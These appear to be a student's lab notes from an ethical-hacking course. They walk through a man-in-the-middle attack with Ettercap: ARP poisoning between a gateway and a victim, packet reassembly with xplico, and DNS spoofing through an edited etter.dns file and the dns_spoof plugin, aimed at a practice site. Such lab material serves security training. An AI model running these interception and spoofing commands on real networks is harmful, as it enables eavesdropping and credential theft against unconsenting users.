Man-in-the-middle (MITM) attack. Intercept traffic between computer and router. Capture and reassemble the packet.
Man in the middle (MITM) attack
Show router table
arp -aStart Ettercap to intercept the traffic (graphical)
ettercap -G- Under Sniff menu, choose Unified Sniffing, Choose network interface (eth0, or wireless)
- Under Hosts, choose Scan all hosts
- Under Hosts, choose Host list
- Select the gateway, click on Add to Target 1
- Select the victim, click on Add to Target 2
- Any traffic going between the router (target 1) and victim (target 2) will be going through the kali linux machine
- Under Mitmm choose ARP Poisonning, and check Sniff remote connection
Test on victim machine
Open a browser
Show router table, MAC should change (victim thinks kali is the router)
arp -aAnalyze the traffic and reassemble packets
xplico: forensic tool under kali menu “Forensics”, might need to download & install.
sudo apt install xplicoCommand line, intercept everything on the network (spoof ARP table)
# Can be run before using Wireshark
ettercap -T -M arp:remote //DNS Spoofing Attack
DNS: Domain Name Services, transfers from name to IP (networks only using IPs). Use www.certifiedhacker.com (website for testing, like a target).
Obtain ip addresses of websites (source and destination)
ping google.com
ping certifiedhacker.comEdit Ettercap DNS configuration file (take a copy first)
cp /etc/Ettercap/etter.dns /etc/Ettercap/etter.dns.bak
nano /etc/Ettercap/etter.dnsGo to “microsoft sucks” and add line
# Add redirection for certifiedhacker.com to other site (172.217.11.46)
*.certifiedhacker.com A 172.217.11.46Command line, apply dns file to ALL traffic (spoof DNS)
# T: text (command line), -q -M, -P: file that we use
ettercap -T –q -M arp:remote –P dns_spoof ///Flush the cache (on windows machine)
ipconfig /release # teacher was a bit confused…
ipconfig /renewTest if it works, should give google ip
ping certifiedhacker.comGo in a browser and test www.certifiedhacker.com
Translate ip to name or name to ip
nslookup ip